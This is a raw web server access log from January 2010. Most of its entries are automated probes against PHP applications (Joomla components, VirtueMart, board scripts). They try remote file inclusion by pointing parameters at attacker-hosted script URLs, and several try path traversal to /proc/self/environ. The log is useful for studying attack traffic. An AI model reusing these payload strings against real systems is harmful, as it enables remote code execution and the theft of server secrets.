115.68.3.94 - - [05/Jan/2010:02:02:18 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:02:02:30 -0500] "GET /logs//popup_window.php?site_isp_root=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:02:02:30 -0500] "GET //popup_window.php?site_isp_root=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:02:02:30 -0500] "GET //popup_window.php?site_isp_root=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:02:02:30 -0500] "GET /logs//popup_window.php?site_isp_root=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:02:02:38 -0500] "GET /logs/access_log.Q109101600//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:02:02:43 -0500] "GET /logs/access_log.Q109101600%20%20//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:02:03:11 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:02:03:11 -0500] "GET /logs/access_log.Q109052100%20%20//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:02:03:12 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:02:03:25 -0500] "GET /logs/access_log.Q109120800//popup_window.php?site_isp_root=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:02:03:27 -0500] "GET /logs/access_log.Q109120800//popup_window.php?site_isp_root=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:02:03:31 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:02:03:32 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:02:03:32 -0500] "GET /logs/access_log.Q109111800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:02:03:32 -0500] "GET /logs/access_log.Q109051500//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:03:35 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:03:37 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:03:38 -0500] "GET /logs/access_log.Q109111800%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:03:38 -0500] "GET /logs/access_log.Q109111800%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:03:38 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:03:39 -0500] "GET /logs/access_log.Q109051500%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:03:40 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:02:03:41 -0500] "GET /logs/access_log.Q109101600%20%20//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:03:41 -0500] "GET /logs/access_log.Q109051500%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:03:49 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:03:49 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:03:58 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:03:59 -0500] "GET /logs/access_log.Q109111800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:04:01 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:04:04 -0500] "GET /logs/access_log.Q109111800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:04:06 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:04:06 -0500] "GET /logs/access_log.Q109111800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:04:06 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:04:10 -0500] "GET /logs/access_log.Q109111800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:04:10 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:04:12 -0500] "GET /logs/access_log.Q109111800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:04:17 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:04:17 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:02:04:25 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:02:04:25 -0500] "GET /logs/access_log.Q109092200//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:02:04:25 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:04:40 -0500] "GET /logs/access_log.Q109051500//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:02:04:42 -0500] "GET /logs/access_log.Q109111800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:02:04:42 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:02:04:42 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:02:04:46 -0500] "GET /logs/access_log.Q109051500//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:02:04:50 -0500] "GET /logs/access_log.Q109092200//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:02:04:50 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:02:04:50 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
210.205.6.233 - - [05/Jan/2010:02:04:55 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://avrovulcan.com/fx29id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
210.205.6.233 - - [05/Jan/2010:02:04:55 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://avrovulcan.com/fx29id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
210.205.6.233 - - [05/Jan/2010:02:04:55 -0500] "GET /logs/access_log.Q109091700//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://avrovulcan.com/fx29id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
210.205.6.233 - - [05/Jan/2010:02:04:58 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://avrovulcan.com/fx29id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
210.205.6.233 - - [05/Jan/2010:02:04:58 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://avrovulcan.com/fx29id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
210.205.6.233 - - [05/Jan/2010:02:04:58 -0500] "GET /logs/access_log.Q109091700//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://avrovulcan.com/fx29id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:05:08 -0500] "GET /logs/access_log.Q109051500//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:05:12 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:05:13 -0500] "GET /logs/access_log.Q109111800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:02:05:19 -0500] "GET /logs/access_log.Q109111800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:02:05:19 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:02:05:19 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:02:05:27 -0500] "GET /logs/access_log.Q109051500//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:05:30 -0500] "GET /logs/access_log.Q109051500//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.205.6.233 - - [05/Jan/2010:02:05:40 -0500] "GET /logs/error_log.Q109091700//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://avrovulcan.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
210.205.6.233 - - [05/Jan/2010:02:05:41 -0500] "GET /logs/error_log.Q109091700//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://avrovulcan.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Jan/2010:02:05:43 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.248.104.130 - - [05/Jan/2010:02:06:01 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:06:01 -0500] "GET /logs/access_log.Q109082000//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:06:01 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:06:07 -0500] "GET /logs/access_log.Q109082000//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:06:07 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:06:07 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:06:10 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:06:11 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:06:15 -0500] "GET /logs/access_log.Q109092200//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:06:20 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:06:20 -0500] "GET /logs/access_log.Q109082000%20%20//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:06:20 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:06:24 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:06:24 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:06:24 -0500] "GET /logs/access_log.Q109082000%20%20//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:02:06:30 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:02:06:30 -0500] "GET /logs/access_log.Q109052100//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:02:06:30 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:02:06:43 -0500] "GET /logs/access_log.Q109071900%20%20/addons/guildbank/searcharrays.php?addonDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:02:06:43 -0500] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:02:06:44 -0500] "GET /addons/guildbank/searcharrays.php?addonDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:02:06:58 -0500] "GET /logs/access_log.Q109101600//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:02:07:13 -0500] "GET /addons/guildbank/searcharrays.php?addonDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:02:07:13 -0500] "GET /logs/access_log.Q109071900/addons/guildbank/searcharrays.php?addonDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:02:07:13 -0500] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:02:07:15 -0500] "GET /logs/access_log.Q109071900%20%20/addons/guildbank/searcharrays.php?addonDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:02:07:15 -0500] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:02:07:15 -0500] "GET /addons/guildbank/searcharrays.php?addonDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:02:07:21 -0500] "GET /logs/error_log.Q109071900%20%20/addons/guildbank/searcharrays.php?addonDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:02:07:22 -0500] "GET /addons/guildbank/searcharrays.php?addonDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:02:07:23 -0500] "GET /logs/access_log.Q109071900/addons/guildbank/searcharrays.php?addonDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:02:07:23 -0500] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:02:07:33 -0500] "GET /logs/error_log.Q109071900/addons/guildbank/searcharrays.php?addonDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:02:07:42 -0500] "GET /logs/error_log.Q109071900/addons/guildbank/searcharrays.php?addonDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
95.108.128.242 - - [05/Jan/2010:02:07:48 -0500] "GET /logs/error_log.Q109090300 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
67.19.194.26 - - [05/Jan/2010:02:07:49 -0500] "GET /logs/error_log.Q109071900%20%20/addons/guildbank/searcharrays.php?addonDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:08:41 -0500] "GET /logs/access_log.Q109051700//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:08:41 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:08:41 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:08:41 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:08:41 -0500] "GET /logs/access_log.Q109051700//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:08:41 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:02:08:44 -0500] "GET /logs/access_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:02:08:44 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:02:08:44 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:02:08:49 -0500] "GET /logs/access_log.Q109103100/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
200.234.200.155 - - [05/Jan/2010:02:08:49 -0500] "GET /?pagina=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
200.234.200.155 - - [05/Jan/2010:02:08:49 -0500] "GET /logs/error_log.Q109112200/?pagina=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
200.234.200.155 - - [05/Jan/2010:02:08:49 -0500] "GET /logs/?pagina=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 200 32908 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:08:56 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:08:56 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:08:56 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:08:56 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:08:56 -0500] "GET /logs/access_log.Q109051700%20%20//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:08:56 -0500] "GET /logs/access_log.Q109051700%20%20//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
212.175.5.130 - - [05/Jan/2010:02:09:30 -0500] "GET /logs/access_log.Q109111800%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
212.175.5.130 - - [05/Jan/2010:02:09:30 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
